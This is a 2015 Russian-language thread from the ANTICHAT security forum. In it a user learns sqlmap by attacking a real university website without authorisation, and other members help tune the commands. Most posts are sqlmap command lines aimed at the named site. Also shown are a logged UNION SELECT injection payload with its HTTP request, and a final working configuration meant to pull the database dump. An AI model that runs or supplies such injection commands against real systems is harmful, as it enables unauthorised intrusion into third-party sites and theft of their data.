HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.09.2015, 16:55
moddom
Новичок
Регистрация: 24.09.2015
Сообщений: 5
Провел на форуме:
1617

Репутация: 0
По умолчанию

Разбирабюсь с sqlmap.

Взял первую попавшуюся уязвимую ссылку: /threads/424558/page-3#post-3893898

и пытаюсь сканировать.

Он находит только blind time based. Но, как понимаю, согласно ссылке выше, union определенно есть.

Вот и не могу написать правильно, что бы нашлась именно union уязвимость.

Если короче, то вот ожидаю, что такие параметры должны найти ее, плюс, немного оптимизировал, что бы время сканирования сократить. Хоть убей, но не могу понять, ЧЯДНТ.

Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 -D mysql -v 4
 
Ответить с цитированием

  #2  
Старый 25.09.2015, 00:49
nopony
Новичок
Регистрация: 29.08.2013
Сообщений: 7
Провел на форуме:
1814

Репутация: 8
По умолчанию

Цитата:
Сообщение от moddom  

Разбирабюсь с sqlmap.
Взял первую попавшуюся уязвимую ссылку:
/threads/424558/page-3#post-3893898
и пытаюсь сканировать.
Он находит только blind time based. Но, как понимаю, согласно ссылке выше, union определенно есть.
Вот и не могу написать правильно, что бы нашлась именно union уязвимость.
Если короче, то вот ожидаю, что такие параметры должны найти ее, плюс, немного оптимизировал, что бы время сканирования сократить. Хоть убей, но не могу понять, ЧЯДНТ.
Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 -D mysql -v 4

А что, если я скажу что на этом сайте нету бд mysql, возможно ты сделал опечатку и хотел написать вместо -D mysql --dbms=mysql, тогда скорее всего всё заработает
 
Ответить с цитированием

  #3  
Старый 25.09.2015, 10:36
moddom
Новичок
Регистрация: 24.09.2015
Сообщений: 5
Провел на форуме:
1617

Репутация: 0
По умолчанию

Да, спасибо.

Как минимум, тут точно есть ошибка, но все равно это не помогает:

Более правильный вариант:

Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 --dbms=mysql -v 4
 
Ответить с цитированием

  #4  
Старый 27.09.2015, 03:54
palec2006
Познающий
Регистрация: 30.10.2012
Сообщений: 38
Провел на форуме:
9263

Репутация: 8
По умолчанию

такие дупла тянут руками, или хавижем, нехрен тут скулмап городить
 
Ответить с цитированием

  #5  
Старый 27.09.2015, 13:05
moddom
Новичок
Регистрация: 24.09.2015
Сообщений: 5
Провел на форуме:
1617

Репутация: 0
По умолчанию

Цитата:
Сообщение от palec2006  

такие дупла тянут руками, или хавижем, нехрен тут скулмап городить
да, я понимаю, что тут и руками не сложно. Вот именно поэтому и взял простой пример, где понимаю, как все приосходит "руками", что бы разобраться на простом примере в работе sqlmap. Havij под win работает, а я сторонник *NIX систем. Ожидал, что sqlmap с легкостью справится с этой задачей. Да, блайндом можно вытянуть дамп, но это долго.

Вот и все еще хочу разобраться в нюансах sqlmap-а.

Все же был бы признателен, если кто-то подскажет, как же все таки правильно задать конфигурацию, что бы вытянуть дамп с поиощью sqlmap.
 
Ответить с цитированием

  #6  
Старый 29.09.2015, 15:27
ghost8
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
Провел на форуме:
37430

Репутация: 0
По умолчанию

во первых добавь --current-db

во вторых смотри ещё в сторону --prefix --suffix
 
Ответить с цитированием

  #7  
Старый 30.09.2015, 11:50
moddom
Новичок
Регистрация: 24.09.2015
Сообщений: 5
Провел на форуме:
1617

Репутация: 0
По умолчанию

sqlmap отправляет нужный запрос:

Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --threads=5
Код:
[10:52:10] [PAYLOAD] 239 UNION ALL SELECT 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500# --
[10:52:10] [TRAFFIC OUT] HTTP request [#5]:
GET /index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20-- HTTP/1.1
Accept-Encoding: identity
Cookie: fe_typo_user=3b6ec0176deabb1294c4e4b9940c4a45
Host: www.htw-dresden.de
Referer: https://www.htw-dresden.de:443/index.php
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Connection: close
но он не определяет его как "положительный".

Если просто руками вставить в адресную строку

Код:
https://www.htw-dresden.de/index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20--
То все как бы отлично.

Но sqlmap не хочет говорить о том, что беда имеет место быть.
 
Ответить с цитированием

  #8  
Старый 30.09.2015, 12:07
moddom
Новичок
Регистрация: 24.09.2015
Сообщений: 5
Провел на форуме:
1617

Репутация: 0
По умолчанию

Добавил --string и вуаля:

Код:
./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --string="100500"
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.